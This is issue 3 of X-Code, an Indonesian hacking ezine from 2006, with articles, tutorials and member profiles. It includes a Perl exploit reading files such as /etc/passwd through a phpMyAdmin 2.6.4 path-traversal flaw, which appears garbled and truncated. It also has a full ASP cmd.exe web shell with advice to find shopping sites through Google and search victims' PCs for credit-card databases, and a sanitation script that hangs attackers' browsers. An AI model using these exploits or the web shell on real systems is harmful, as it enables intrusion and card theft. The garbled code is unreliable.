X-Code Magazine Edisi 3: Hacking & IT
X-Code Magazine Edisi 3: Hacking & IT
X-CODE
Magazine
X-Code Licensi for Article, logo, etc | Computer •
Internet • Hacking
[Link] | [Link] |
[Link]
X-Code Magazine No. 3 dari redaksi
Apa itu Majalah X-Code :
- X-Code magazine adalah majalah komputer, internet dan hacking
dengan
bahasa Indonesia dengan penggunaan Media Murni PDF.
Tujuan :
- Memberikan / sharing / berbagi artikel untuk perkembangan ilmu
komputer, internet dan hacking di Indonesia.
Misi :
- Menyebarkan ilmu-ilmu komputer, internet dan hacking untuk
tujuan
positif.
Team X-Code
Daftar Isi X-Code Magazine No. 3:
1. Perjuangan komunitas di pertengahan tahun Oleh
^family_code^ - Hal 1
2. Cara membuka akses keseluruhan dari database oleh
DOKTER^CINTA
- Hal 4
3. Membuat File Super Hidden oleh Yogie - Hal 8
4. Attack: Script Sanitasi Input oleh roninmorgue – Hal 11
5. Instalasi APACHE, PHP dan MySQL pada system WinXP
Ver 1.1 oleh
n0n4m3 - Hal 17
6. Lupa sandi email Yahoo anda oleh mas’ud (WoNX- Hal 23
7. Belajar dasar Borland C++ Builder dengan 3 tutor oleh
^family_code^ –
Hal 27
8. Hack Website Shopping With [Link] oleh m_beben
– Hal 37
9. Profile Saben founder HitamPutihCrew oleh Saben – Hal 41
10. Prophile On Roninmorgue oleh roninmorgue – Hal 42
11. Profile Mbak Nita Si Progammer (PushM0v) oleh
PushM0v (kata pengantar artikel oleh redaksi) – Hal 46
11. Deface with PHP Bugs oleh m_beben - Hal 48
12. Compilasi dengan LCC dan permasalahannya oleh
^family_code^ – Hal
53
13. Mencari Alamat Target In One Hosting oleh m_beben – Hal
57
14. Teknik Mudah Cracking 4 Software Terbaru
Dachshund Software
Jerman oleh NeMeSiS_ByTe - Hal 62
Sebelum ahkir bulan Juni 2006, mungkin sudah banyak yang tahu, dari
awal bulan Juni hingga pertengahan bulan Juni 2006, Yogyafree
kesulitan mencari hosting untuk meletakkan webnya sejak hosting di
server dari Hartono tidak jalan untuk web Yogyafree, kemudian
beberapa waktu kemudian T-Koes meminjamkan web servernya untuk
web Yogyafree dan setelah beberapa waktu lamanya ahkirnya hosting
t-koes kehabisan bandwidth juga karena tidak lagi mampu menahan
besarnya kebutuhan bandwidth yang semakin besar untuk Yogyafree,
hal ini sama persis seperti nasib hosting-hosting
Yogyafree sebelumnya.
Tapi baru terlepas dari permasalahan hosting, ahkirnya terjadi hal yang
buruk, forum phpBB Yogyafree dibekukan yang
berada di [Link] sebelum forum
Yogyafree dibekukan, forum rekan Yogyafree yaitu HitamPutih
pimpinan Saben yang berada di [Link]
dengan url [Link] juga dibekukan,. Akibat
pembekuan forum Yogyafree memukul komunitas cukup keras, karena
dengan perubahan ini membuat link-link di Web Classic , X-Code
Energy GTS
1
6.0, url forum dari milis dan media lainnya menjadi pincang (url
tidak aktif)
akibat dari pembekuan forum phpBB
ini.
2
Ahkirnya penulis melobi Admin [Link] melalui e-mail
untuk mendapatkan backup Forum phpBB Yogyafree, dengan
melobi beberapa hari ahkirnya penulis mendapatkan backupnya,
terima kasih banyak [Link], ini merupakan hal luar biasa yang
memberikan Yogyafree sebuah kesempatan untuk bangkit dari
kepincangan setelah beberapa waktu lamanya, tapi walau begitu
permasalahan restore menjadi permasalahan tersendiri yang cukup
berat, karena banyak para crew Yogyafree tidak berhasil melakukan
restore termasuk penulis sendiri, setelah sekian waktu
ahkirnya JerryMaheswaraberhasil melakukan restore dan
forumpun kembali seperti semula.
4
Yogyafree tetap berjuang, berbagi, sharing bersama dari
komunitas untuk komunitas dan masyarakat IT di Indonesia.
Penulis :
Kurniawan /
^family_code^
5
Cara membuka akses keseluruhan dari
database
6
1. Direktory phpmyadmin biasa nya ada di
[Link] nah apabila direktory itu tidak di
proteksi maka gawat donk jadi biasa nya tempat itu pasti di
password...
7
nah loh gimana kita masuknya??? jangan panik....
lanjut saja
2. file vulnerable yang bisa kita intip maka berdasarkan hal di atas
( duh kek lagi kuliah aja yah formal banget ) , mari kita membuat
exploit sederhana
#!/usr/bin/perl
use IO::Socket;
# dokter^cinta
# bruteforce team @dalnet
#
# exploit phpMyAdmin 2.6.4-pl1
#
#
# Greatz to all my friends
# thanks for your idea to make this exploit
#
# Contact : [Link][at][Link]
# Website : [Link]
#
if (@ARGV < 3)
{
print "\r\n Modified By: Dokter^cinta @ dalnet\r\n";
print "EXpl01T phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl [Link] target /DIR/ FILE\r\n\r\n";
print "target - target dimana ada phpmyadmin contoh: [Link]
print "DIR - Direktori untuk PMA contoh: /phpMyAdmin- 2.6.4-pl1/\r\n";
print "FILE - file untuk di intip ../../../../../etc/passwd\r\n\r\n";
print "contoh cmd: perl [Link] [Link] /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd\r\n\r\n";
print "\r\n Bruteforce Team @dalnet\r\n";
exit();
}
$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.[Link]";
8
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".
9
$ARGV[2]. "&subform[1]
[cXIb8O3]=1";
$LENGTH = length $FILE;
printf $odp;
}
serang !!!!!!!!!!!!!!!!!!!
target adalah :
[Link] dan good
luck
10
you got their database
11
:P
==========================================
================= WARNING !!!
DOKTER^CINTA
12
Membuat File Super
Hidden
Asline aku dah pernah bikin tulisan ini, tapi ya karena seperti
yang udah aku ceritakan sebelumnya. Yang websiteku trouble gara-
gara pas lagi proses upgrade mengalami error di tengah jalan. Ya udah
tulisanku ilang semua, dan sekalian pindah rumah (hosting) deh. Jadi
ya sekarang aku jadi blogger pemula lagi.. hehehehe…
Ehm, tentang membuat file Super Hidden ini au tulis lagi karena ada
beberapa yang nanyain tentang gimana cara bikinnya. Padahal kalo
misalnya pada mau coba-coba buka DOS Console dan ketik help pasti
bakalan tau kok jawabannya. Ya udah ga papa wis, aku tilis lagi ya…
here we go..
Pertama kali dapet cara ini gara-garanya komputerku (Win XP) kena
trojan. Biasane kalo cuma virus aja sih file asli yang terinfeksi virus
akan balik lagi ketika virus itu terdeteksi ama antivirus (ntah kalo
skarang). Nah beda ama trojan, yang akan tetep meng-umpet-kan file
yang terinfeksi menjadi file System (aku suka nyebutnya Super
Hidden).
D:\Ple-Q\Work\Penting>dir
Volume in drive D is DATA
Volume Serial Number is 445E-9DA9
Directory of D:\Ple-Q\Work\Penting
06/13/2006 11:57a.
13
06/13/2006 11:57a..
0 File(s) 0 bytes
14
2 Dir(s) 3,792,273,408 bytes free
Nah padahal di folder itu ada beberapa file. Sekarang aku coba
dengan perintah lain
D:\Ple-Q\Work\Penting>dir /a
Volume in drive D is DATA
Volume Serial Number is 445E-9DA9
Directory of D:\Ple-Q\Work\Penting
06/13/2006 11:57a .
06/13/2006 11:57a ..
05/30/2006 02:08p 89,600 Sinopsis PINK Eps [Link]
06/09/2006 12:06a 973,824 modul [Link]
06/13/2006 11:42a 38,755 logo gajahmada [Link]
3 File(s) 1,102,179 bytes
2 Dir(s) 3,792,273,408 bytes free
D:\Ple-Q\Work\Penting>attrib
A SH D:\Ple-Q\Work\Penting\Sinopsis PINK Eps [Link]
A SH D:\Ple-Q\Work\Penting\modul [Link]
A SH D:\Ple-Q\Work\Penting\logo gajahmada [Link]
Nah, keliatan semua deh dia termasuk dalam file apa. Ternyata semua
file didalam folder itu udah berubah jadi SH. (System dan Hidden) atau
bahasa kerennya Super Hidden.. Hehehheehe… udah sekarang gimana
cara balikinnya? kita liat manualnya dulu alias help. Bukankah guru
terdekat kita adalah help dan F1? hihihi kalo linuxers ya man.
hohoho..
D:\Ple-Q\Work\Penting>help attrib
Displays or changes file attributes.
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [[drive:] [path] filename]
[/S [/D]]
+ Sets an attribute.
- Clears an attribute.
R Read-only file attribute.
A Archive file attribute.
S System file attribute.
H Hidden file attribute.
/S Processes matching files in the current folder
and all subfolders.
/D Processes folders as well.
15
D:\Ple-Q\Work\Penting>attrib -s -h “modul [Link]”
D:\Ple-Q\Work\Penting>attrib
A SH D:\Ple-Q\Work\Penting\Sinopsis PINK Eps [Link]
A D:\Ple-Q\Work\Penting\modul [Link]
A SH D:\Ple-Q\Work\Penting\logo gajahmada [Link]
D:\Ple-Q\Work\Penting>attrib -s -h /s /d
D:\Ple-Q\Work\Penting>attrib
A D:\Ple-Q\Work\Penting\Sinopsis PINK Eps [Link]
A D:\Ple-Q\Work\Penting\modul [Link]
A D:\Ple-Q\Work\Penting\logo gajahmada [Link]
D:\Ple-Q\Work\Penting>dir
Volume in drive D is DATA
Volume Serial Number is 445E-9DA9
Directory of D:\Ple-Q\Work\Penting
06/13/2006 11:57a .
06/13/2006 11:57a ..
05/30/2006 02:08p 89,600 Sinopsis PINK Eps [Link]
06/09/2006 12:06a 973,824 modul [Link]
06/13/2006 11:42a 38,755 logo gajahmada [Link]
3 File(s) 1,102,179 bytes
2 Dir(s) 3,792,273,408 bytes free
Yak.. sudah
selesee….
Sekarang kembali ke judul, gimana cara
bikinnya?
nah kalo misalnya merhatiin cara-cara menampilkan file ya ter-
super-hidden,
harusnya dah bisa bikinnya dong.. coba liat-liat lagi. Atau ketik lagi
help attrib. Aku kasih clue ya.. yaitu tanda plus (+).
16
Attack: Script Sanitasi Input
----//
Pengantar
* strip_tags, mysql_escape_string,
htmlentities dll
* menerapkan aturan regular expresion -> preg_match, ereg,
ereg_replace
----// Potensi
Kerusakan
18
website kita, sekaligus untuk sedikit memberi pelajaran pada
siiseng.. kita buat browser dia untuk looping
sebanyak2nya...OK
Disini kita akan membuat sebuah fungsi yang akan digunakan untuk
men- sanitasi string yang dimasukkan oleh user,
apabila string tidak bermasalah/mengandung kode-kode dan
maksud yang tidak baik maka data akan diinput kedalam database
aplikasi kita sedangkan jika sebaliknya maka fungsi ini akan
memfilternya dan mem-bypass ke sebuah script yang akan diterima
oleh user yang mengirimkan kode tersebut :)
--------------------------------------------
eof---------------------------------------
----// Penjelasan
Script
Baris 24 - 25 Jika kondisi true maka data yang akan dimasukkan oleh
user akan dimasukkan kedalam database apa adanya.
Baris 27 - 38 Jika kondisi false maka fungsi akan mem-bypass input dari
user dan mengeksekusi sebuah script yang akan dikirimkan
kekomputer klien/user penyerang. Dalam contoh ini saya membuat
pada komputer user akan muncul kotak peringatan yang harus diklik
1000 x, dan ini akan membuat browser user tidak berjalan
semestinya/hang
----//
Implementasi
21
# 7 <form name="form1" method="post" action="">
# 8 <table width="200" border="1">
# 9 <tr>
# 10 <td>Nama</td>
# 11 <td><input name="nama" type="text" id="nama"></td>
# 12 </tr>
# 13 <tr>
# 14 <td>Jabatan</td>
# 15 <td><input name="jabatan" type="text" id="jabatan"></td>
# 16 </tr>
# 17 <tr>
# 18 <tr>
# 19 <td>Komentar</td>
# 20 <td><textarea name="komentar" id="komentar"></textarea></td>
# 21 </tr>
# 22 <td colspan="2"><input name="submit" type="submit" id="submit"
value="Submit"></td>
# 23 </tr>
# 24 </table>
# 25 </form>
# 26
# 27 <?php
# 28 } else {
# 29 connect();
# 30 $periksaNama = strip_tags($nama);
# 31 $periksaJabatan = strip_tags($jabatan);
# 32 $periksaKomentar=komentar($komentar); // menyertakan fungsi sanitasi
komentar
# 33 $query=mysql_db_query($db, "insert into user (nama, jabatan, komentar)
values
# 34 ('$periksaNama', '$periksaJabatan',
'$periksaKomentar')");
# 35 if($query){
# 36 echo "Data Berhasil diinput";
# 37 }else{ echo "Data Gagal diinput"; }
# 38 }
# 39 ?>
--------------------------------------------------
eof-------------------------------------------
----// Penutup
---//
Referensi
-----------------------------------------------------------------------------
------ Shoutz:
~~~~~
~~
------- Contact:
~~~~~
~~~
roninmorgue || forum|staff
24
Homepage: [Link]
email:
roninmorgue[at]yahoo[dot]co[dot]i
d
anstellwinkel[at]yahoo[dot]com[do
t]au
25
Instalasi APACHE, PHP dan MySQL
pada system WinXP
Ver 1.1 By n0n4m3
Apa itu
APACHE ?
APACHE adalah salah satu program web server yang melayani
permintaan http
(http request) oleh web browser. Contohnya kalau anda
berkunjung ke [Link] maka akan di reply oleh
program web server.
Apa itu
MySQL?
MySQL adalah salah satu program database seperti halnya
dBase, Foxpro, Microsoft ACCESS, dll.
Apa itu
PHP?
PHP adalah salah satu bahasa pemrograman script untuk web. Dengan
PHP kita
dapat menampilkan dan mengolah database MySQL melalui web
browser yang dilayani oleh APACHE.
Download
Program
Siapkan ketiga program diatas terlebih dahulu. Anda bisa
mendapatkan
program tersebut secara gratis di internet karena program
26
tersebut program
open
source.
APACHE [Link]
PHP [Link]
27
MySQL [Link]
Instalasi MySQL
• Jalankan program [Link]
untuk mulia instalasi.
• Klik tombol “Next” pada Welcome screen.
• Pilih “Typical” pada Setup Type screen dan klik tombol “Next”
Pilihan “Typical” akan menginstall program MySQL Server dan
Client
Program
s.
Pilihan “Complete” akan menginstall seperti pilihan “Typical”
ditambah dengan file-file C Include dan file-file Lib. File – file ini
diperlukan jika Anda akan menggunakan MySQL bersama dengan
pemrograman bahasa C.
Pilihan “Custom” akan menginstall program sesuai pilihan
Anda saja.
• Klik tombol “Install” pada Ready to Install screen.
• Setelah proses instalasi selesai akan muncul [Link] Sign-Up
screen.
Pilih saja “Skip Sign-Up” jika Anda tidak ingin membuat
account atau
login di website [Link] dan klik tombol
“Next”.
• Pada screen “Wizard Completed” pilih “Configure the
MySQLServer now” dan klik tombol “Finish”.
• Akan muncul screen “Welcome to the MySQL Server
Instance
Configuration Wizard” dan klik tombol
“Next”.
• Pilih “Standard Configuration” dan klik tombol “Next” pada
screen
“Please select a configuration
type”.
• Pada screen “Please set Windows option” aktifkan “Install As
Windows Service”, pilih “Service Name” sesuai versi MySQL ini
yaitu MySQL5, aktiftkan “Launch the MySQL Server
28
automatically” dan “Include Bin Directory in Windows PATH”.
• Aktifkan “Modify Security Settings” dan masukan password
baru di bagian input “New root password” dan input
“Confirm”. Aktifkan “Enable root acess from remote machine”
jika Anda berada pada jaringan komputer dan akan meng-akses
MySQL ini lewat komputer lain. Klik tombol “Next”.
• Klik tombol “Execute” untuk memulai konfigurasi dan
menyalakan server MySQl.
• Setelah konfigurasi berhasil dan MySQL server berjalan klik
tombol
“Finish”
.
29
Untuk memastikan server MySQL telah berjalan tekan tombol CTRL-
ALT-DEL. Cari “[Link]” pada tab Processes. Jika ada berarti
MySQL telah berhasil di instalasi dan telah berjalan pada komputer
Anda.
Instalasi
PHP
• Un-zip file instalasi PHP yang telah Anda dapat diatas. Disini
penulis unzip ke direktori c:\php. Anda bisa saja unzip ke direktori
lain.
• Cari file [Link] dalam direktori c:\php hasil unzip
langkah sebelumnya dan copy-kan ke direktori System
32 dalam folder WINDOWS (c::\Windows\System32).
• Cari file [Link]-dist dalam direktori c:\php hasil unzip
langkah sebelumnya dan copy-kan ke direktori Windows (C:\
Windows) dan rename file ini menjadi [Link]
• Edit file [Link] dengan program notepad atau wordpad. Cari
bagian “extension_dir = "./" ” (untuk mempermudah pakai
fasilitas find dari menu edit) dan ubah menjadi :
extension_dir = "c:\php\ext\"
session.save_path = C:\WINDOWS\TEMP
Instalasi
APACHE
• Jalankan file apache_2.0.55-win32-x86-no_ssl.exe untuk instalasi
program
APACHE
• Klik tombol “Next” pada “Welcome Installation Wizard” screen
• Pilih “I accept the term …” dan klik tombol “Next” pada screen
30
“License
Agreement”
• Klik tombol “Next” pada screen “Read This First”
• Masukan nama “Network Domain”, “Server Name” dan
“Administrator’s
Email …” serta pilih “for All Users ….”
31
“Network Domain” diisi nama domain Anda contohnya
[Link]
“Server Name” diisi nama server Anda contohnya
[Link]
• Klik tombol “Next”
• Pilih “Typical” dan klik tombol “Next” pada screen “Setup Type”
• Klik tombol “Next” pada screen “Destination Folder” untuk
instalasi pada folder C:\Program Files\Apache Group\
• Klik tombol “Install” pada screen “Ready to Install …” untuk
memulai proses instalasi
• Klik tombol “Finish” pada screen “Installation Wizard
Completed”
setelah proses instalasi selesai
LoadModule php5_module
c:/php/[Link] AddType application/x-
httpd-php .php .php3 .phtml AddType
application/x-httpd-php-source .phps
Setelah instalasi APACHE pada system tray (lihat bagian pojok kanan
bawah) akan tampak ikon “Apache Service”. Klik dua kali ikon ini
akan tampak windows “Apache Service Monitor”. Tekan tombol
“Restart” untuk restarting apache server dengan konfigurasi baru yang
telah kita lakukan diatas.
32
Jika konfigurasi diatas benar maka lambang Apache2 (seperti gambar
matahari)
akan berwarna hijau dan merah jika konfigurasi file [Link] ada
yang salah.
33
Pada sudut kiri bawah windows “Apache Service Monitor” akan tampak
tulisan
Apache/2.0.55 (Win32) PHP/5.1.2
<html>
<head>
<title>Hari Ini Tanggal :</title>
</
head>
<body>
<p>Hari Ini Tanggal (menurut tanggal Web server ini) :
<?php
echo( date('l, F dS Y.') );
?></
p>
</body>
</html>
Bukalah program web browser (Internet Explorer, Fire Fox, Opera, dll)
Anda dan ketikan localhost pada input “Address” dan tekan “ENTER”.
Browser akan menampilkan pesan dari program web server (Apache)
yang telah Anda install dan tulisan “Powered by APACHE” pada bagian
bawah. Jika pesan tersebut muncul maka web server Anda telah
34
berjalan.
35
Pengujian My SQL dapat Anda lakukan melalui command prompt. Pada
command prompt masukan perintah :
By
n0n4m3
(n0n4m3@[Link])
36
Lupa sandi email Yahoo anda.
37
2. Setelah masuk, anda isikan tanggal lahir anda, kode pos, dan
negara asal anda yang sesuai dengan isian anda sewaktu anda
mendaftar layanan e- mail Yahoo.
38
4. Isikan id Yahoo anda pada kolom Lupa sandi Anda? Kalau anda
memilih untuk mendapatkan kata sandi anda kembali
39
6. Isikan jawaban pertanyaan rahasia. Harus sesuai dengan
jawaban anda saat pendaftaran account Yahoo.
40
Belajar dasar Borland C++ Builder dengan 3
tutor
Selamat
membaca
41
akan tampikan tampilan seperti dibawah ini :
42
Sekarang tinggal ikuti saja table dibawah ini :
43
Kalau udah bikin formnya sekarang tinggal bikin sourcenya aja,
gimana caranya
? Ikuti petunjuk dibawah
ini :
45
Double klik pada Button Reset lalu masukkan
source :
Close();
Nah sekarang selesai deh programnya, tinggal disave lalu di Run lalu
kalau mau dicompile, ya compile aja. ☺
46
Button1 Name Button1
Caption Tampilkan
Button2 Name Button2
47
Caption Keluar
Label1 Name Label1
Caption Media Yogyafree
Edit1 Name Edit1
Text Dikosongkan
Setelah selesai bikin formnya maka anda tinggal double klik button
Tampilan saja, lalu tulis sourcenya :
switch (RadioGroup1->ItemIndex)
{
case 0 :
{
Edit1->Text =
RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 1 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 2 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 3 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
case 4 :
{
Edit1->Text = RadioGroup1->Items->Strings[RadioGroup1->ItemIndex];
}
}
Setelah itu double klik pada button Keluar lalu masukkan source :
48
Close()
Dengan 2 tutor dasar diatas diharapkan bisa sedikit tahu tentang dasar
pemograman dasar Borlan C++ Builder, sekarang kita akan membuat
program yang lebih fungsional yaitu program Editor seperti Notepad
yang mungkin bisa anda manfaatkan untuk membuat exploit, artikel
dan sebagainya,ya serasa lebih enak bikin source atau artikel dengan
program bikinan kita sendiri dari C programming. ☺
Disini kita akan mencoba membuat sebuah Text Editor dengan Borland
C++ dengan memanfaatkanmemanfaatkan komponen
RichEdit, MainMenu, SaveDialog dan OpenDialog.
Jika anda masih bingung apa itu Main Menu, Open Dialog dan Save
Dialog, penulis memberikan gambarnya dibawah ini :
49
Setelah dibuat klik kanan pada MainMenu lalu pilih Menu Designer,
setelah muncul kotak dialog Form1->MainMenu1, lalu isi seperti
dibawah ini :
Nah bikin aja pada Menu File, seperti diatas, disini yang penting
yang diisi adalah Caption dan namenya, ingat name gak boleh sama
satu dengan lainnya.
Tapi jika anda masih bingung mau diisi apa ikuti saja name dan
captionnya seperti dibawah ini :
Name : Baru
Caption : &Baru
Name : Buka
Caption : &Buka
Name : Simpan
Caption : &Simpan
Name : Exit
Caption &Exit
50
Untuk Edit seperti dibawah ini menunya
Untuk lebih baiknya ikuti name dan captionnya dibawah ini jika
anda baru pertama kali membuatnya.
Name : Copy
Caption : &Copy
Name : Paste
Caption : &Paste
Name : Cut
Caption : &Cut
51
Setelah sudah jadi formnya, kita tinggal menulis sourcenya aja,
bagaimana caranya ? ☺
RichEdit1->Lines->Clear();
RichEdit1->Modified=False;
if (OpenDialog1->Execute())
RichEdit1->Lines->LoadFromFile(OpenDialog1->FileName);
if (SaveDialog1->Execute())
RichEdit1->Lines->LoadFromFile(OpenDialog1->FileName);
Close()
RichEdit1->CopyToClipboard();
RichEdit1->PasteFromClipboard();
52
Klik File -> Cut lalu diisi
sourcenya :
RichEdit1->CutToClipboard();
Penulis :
Kurniawan /
^family_code^
53
Hack Website Shopping With
[Link]
Thanks to :
Co_BaiN
Author : #kartubeben crew @
DalNet
Website :
[Link]
Sebenarnya teknik ini mudah banget lho, gak percaya ??? Bahkan
hampir semudah semudah copy-paste di bug web folder ☺ hanya saya
di sini ada dituntut untuk memahami command-command DOS (no
unix command here !!!) lebih banyak, atau paling tidak sedikitlah.
Hmm... mungkin ada yang harus penulis ingatkan, walau judul artikel
kali ini adalah “HACK WEBSITE SHOPPING WITH [Link]” tetapi
54
menulis tidak ingin membahas bagaimana mencari Credit Card di
sini, karena apa ???
55
Yah, karena penulis sendiri cenderung malas untuk mencari cc sendiri,
mending minta pasteannya aja ama kawan :P~ prêt !!!
Nah, lalu bagaimana langkah selanjutnya ????
Langkah pertama adalah silahkan copy-kan script ASP yang penulis
dapatkan dari site [Link] berikut ini lalu di save dengan nama
terserah anda yang penting ekstensinya adalah asp, sebagai contoh
anda simpan saja script ASP ini dengan nama [Link] :
---------------------=[ cut here the code ]=---------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: [Link]
' Author: Maceo <maceo @ [Link]>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = [Link]("[Link]")
Set oScriptNet = [Link]("[Link]")
Set oFileSys = [Link]("[Link]")
' -- check for a command that we have posted -- '
szCMD = [Link](".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & [Link]( )
Call [Link] ("[Link] /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = [Link] (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= [Link]("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Eksekusi Perintah">
56
</FORM>
<PRE>
<%= "\\" & [Link] & "\" & [Link] %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
[Link] [Link]([Link])
[Link] Call [Link](szTempFile, True)
End If
%>
</BODY>
</HTML>
<-- [Link] -->
Oh iya hampir lupa, langkah selanjutnya yah ??? hmmm anda bisa
mencari target di google atau di search engine kesayangan anda, terus
masukkan keywords yang kira-kira akan mengarahkan anda ke web
yang memiliki file [Link] (penulis tak sengaja menemukannya
ketika mencoba-coba mencari [Link] kemudia ketika
penulis menghapus nama file [Link] eh
ternyata tuh site bisa di browsing directory, nah kemudian penulis
menemukan file [Link] ini :P~ )
58
melakukannya.
Hm... jika anda ingin mencari cc di target, silahkan aja anda ketik
command berikut :
Dir *.mdb /s
Command itu berguna untuk mencari file-file yang berekstensi .mdb di
seluruh pc korban, siapa tau ada beberapa file menarik yang berisi cc
di dalamnya. Lalu untuk men-downloadnya, hehehe... silahkan cari
sendiri caranya, penulis gak mau ikutan dapat dosa kolektif atas
penyalahgunaan cc yang anda dapat tersebut ☺☺☺
Sekian artikel ini penulis buat, semoga ente merimanya dengan
lapang dada. Amienn.......
------------------------------------------------------------
----- Greatz : #kartubeben crew @
[Link]
K-159 and all of #aikmel crew and staff
the_day, y3dips and all of #e-c-h-o crew
and staff kevin yang udah banyak
membantu penulis Nixell yang udah
berbaik hati kenapa penulis
sam_stradlin , PARMIN , CupiD^ , pakcik dan semua yang udah bantu-
bantu di
#kartubeben
Special : bang Co_BaiN yang udah mengajari penulis perhatikan
-----------------------------------------------------------------
#kartubeben
@ [Link]
59
Profile Saben founder
HitamPutihCrew
Nama :
Aang
Asal :
Tegal
IRC Nick : SaBeN ,
IbnuSina
Pekerjaan : Kuliah amburadul gara gara ketagihan
chatting xixixi
Cerita Si Sayah : saya dulu mengenal internet pas taun 2003,itu aja
belum bisa apa² cuman bisa buka web porno sama chattingan di mirc,
xixixi ( bikin email saja belum bisa ), trus bulan oktober sisaya disuruh
sama ortu melayat ke negri orang yang sama sekali belum pernah
ditemui, nah di negri itu sisaya baru mengenal lebih dalam masalah
internet ( soalnya disini murah uy internetnya,
sejam paling sekitar 2000 rupiah, koneksinya juga sip,aw aw aw),
nah pertama kali saya coba itu bikin email diyahoo, ternyata setelah
dicoba tak sesulit yang ada dipikiran saya waktu itu,trus meningkat
lagi, waktu itu saya melihat ada website apa yah lupa, yang penting
pake hosting [Link] nah saya utak atik itu web tripod, dan
mencoba bikin website, ternyata bikin website juga ga sesulit yang ada
dipikiran saya waktu itu, (meskipun websitenya sangat ancur lebur,
kwkwkwk), saya bener² semakin pingin tau lebih dalam lagi masalah
internet, lalu saya mencoba mencari tutorial² lewat google,sampe
akhirnya nemu website [Link] waktu itu, trus saya mencoba
bergabung di channel yogyafree, orangnya baix² hingga sekarang
saya masih aktip di channel yogyafree, hehe, yah sekarang sisaya
kalo disuruh nyari cc atau insya allah deh,xixixi (dasar otak²
perusak,kwkwkwk), dan alhamdulillah berkat dukungan dari crew
yogyafree, sisaya bisa bikin channel sendiri, bukan tujuan nyaingin
tapi mencoba inofasi [Link] udah kebanyakan nih
ceramahnya, xixixi, ya sudah udahan segitu saja ah, cape ngetiknya.
60
Nb : sekedar inpormasi channel sisaya #hitamputihcrew
@[Link]
61
Prophile On
Roninmorgue
== Prophile On
Ronoinmorgue ==
[ Specification ] >>
Handle :
Ronoinmorgue
A.K.A : ANSTELLWINKEL,
KOY^K^GUY^ Handle Origin : EX-
JAPAN SAMURAI
Date of Birth : May 03, On Year
1980
Produce In : Jakarta
Indonesia
Contact : roninmorgue@[Link],
anstellwinkel@[Link]
Height & Weight : 182 Cm
65 Kg
Urlz : Http://[Link],
Htp://[Link]/bloggw/
Computer : AMD Sempron(tm) 2400+, DDR PC2700 512MB, 40 GB
HD, Linux
Slackware/ WinxXP,Win 2003
Server
Project : Write An Exploits, Article, Finding a Wwb
Application Bugs
Hobby : Music, Computer, Science,
Reading.
[ Favorite things ]
>>
Fod : Nasi Padang, Soto
Betawi Drink : Pocary
62
Sweat, Teh Botol Smoke :
No Smoking
Band : All Good Band And I Like Them
Songs
Genre : Rock, Punk, Gothic, Alternative, Pop, Slow Rock, Dangdut
Melayu. Movies : Behind Enemy Lines, Titanic, All War Mivie.
Books : Naruto, All Hacking Book I Know Ezine From
Echo.
I Like : My Parents, My Girls, Computer, Science, Strategic Game, Pizza
(Chesee),
Beff
Steak.
I Dislike :
Arrogancy.
[ Words ]
>>
"Believe Nothing...Trus No One, Expect
YourSelf"
63
[ Hopes ] >>
Better Than
Yesterday
>> [ short
story ]
Pertama saya mengenal komputer pada tahun 1994 sewaktu kelas 2
SMP, dan
disaat itu pulalah saya memiliki komputer saya yang pertama dengan
spesifikasi PC AT 286, masih ber-OS-kan MSDOS x.x.x(lupa). Bersama
teman saya ( jundiwan ) yang tertarik juga dengan
komputer mulai mempelajari programming, waktu itu
saya menggunakan BASIC. Bersama DOS saya sering bermain-main
dengan BAT dan ternyata sangat menyenangkan, sampai dengan
3 SMP saya sudah mulai berkenalan dengan virus komputer yang
sering menjadi
langganan komputer saya, KEYPRESS itulah nama virus yang sering
hinggap dan sayapun mulai mencari tahu bagaimana mengatasi hal
tersebut dan berkenalanlah saya dengan Mcafee Antivirus DOS version
(saya lupa versinya).
64
Pembangunan Jakarta)...NEM ngga cukup euy (akhirnya saya dapetnya
malah Bangunan Gedung :( ). Periode inilah masa kelam saya dengan
komputer karena meskipun sudah berganti menjadi AT 386, AT 486
sampai dengan 233 MMX tidak pernah saya gunakan melainkan hanya
bermain game (dari versi DOS sampai Windows saya ada tuh :)) dan
menggambar dengan AutoCAD (maklum Bangunan Gedung sih n
kerja diperusahaan konstruksi).
Tahun 2001, itulah awal saya kembali kepada dunia yang telah
dirindukan selama ini... IT man cos saya kuliah lagi dibidang yang saya
minati (walaupun sebenarnya ngga perlu kuliah juga sih :)), but anyway
saya mengganti komputer saya dengan AMD Duron 850 MHz...inilah
kali pertama saya mulai tertarik
65
dengan AMD cos lebih murah sih. Penggantian ini disebabkan MOBO
saya tersambar petir sewaktu OL dengan telkomnet instan :(.
Walaupun saya merasa terlambat cos teman saya jundiwan sudah jauh
melewati saya dalam dunia komputernya n dia sudah dapat membuat
virus yang menyerang BIOS serta melakukan hacking terhadap situs-
situs xxx...Ah jadi tambah kecewa saya but saya yakin pasti bisa
mengejar atawa minimal menyamai lah :)
Mulai tertarik dengan dunia hacking saat dapet MKul Sistem Keamanan
Komputer, melihat situs jasakom, echo dan lebih tertarik lagi saat tahu
ada komunitas yogyafamilycode at [Link] (itu url yang
saya tahu pertama kali hasil dari google) pada akhir2 tahun 2004,
sempat nunggu lama untuk bergabung jadi members karena setau
saya syarat jadi members adalah menulis komentar dibuku tamu dan
